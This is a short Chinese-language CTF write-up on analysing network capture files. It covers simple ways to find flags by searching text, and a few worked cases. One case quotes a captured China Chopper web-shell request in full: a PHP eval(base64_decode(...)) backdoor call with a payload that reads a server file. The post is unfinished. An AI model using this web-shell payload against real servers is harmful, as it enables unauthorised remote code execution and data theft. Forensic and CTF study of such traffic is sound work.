CTF之流量分析

CTF雜項中存在一種題型——流量分析，主要是給你一個流量包，讓你分析獲取其中的flag的值。

有5種方式，可以直接查找flag。

1、直接搜索

2、使用notepad++等軟件，直接打開流量包，搜索關鍵字

3、編寫python腳本

#encoding:utf-8#用二進制方式讀取文件file=open("networking.pcap","rb")#讀取文件內容i=file.read()#查找字段a1=i.find("flag{")a2=i.find("}",a1)#將查找的字段，組合起來a3=i[a1:a2+1]print a3

4、windows cmd命令

type networking.pcap | findstr "flag"

5、linux string 命令

strings networking.pcap | grep flag

實戰

案例一：

案例二：

使用wireshare打開pcap包，顯示tcp流

好像已經找到了密碼，但是有點不對勁，hex dump一下看看。

7f對應的ascII碼是DEL，是刪除，0D代表的是回車。

因此flag是backdoor00Rm8ate

案例三：簡單文件提取

wireshark讀取pcap包，追蹤TCP流，

將post請求，進行url及base64解碼，發現好像是菜刀客戶端流量，使用菜刀客戶端下載了x.tar.gz文件。

ISG2014=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();&z1=/var/www/html/x.tar.gz

因此，接下來，我們需要從數據包提取該文件，使用winhex來提取。

沒有復現成功，每天研究：

類似題型：

https://www.pianshen.com/article/42121685884/

案例四:

未完待續。。。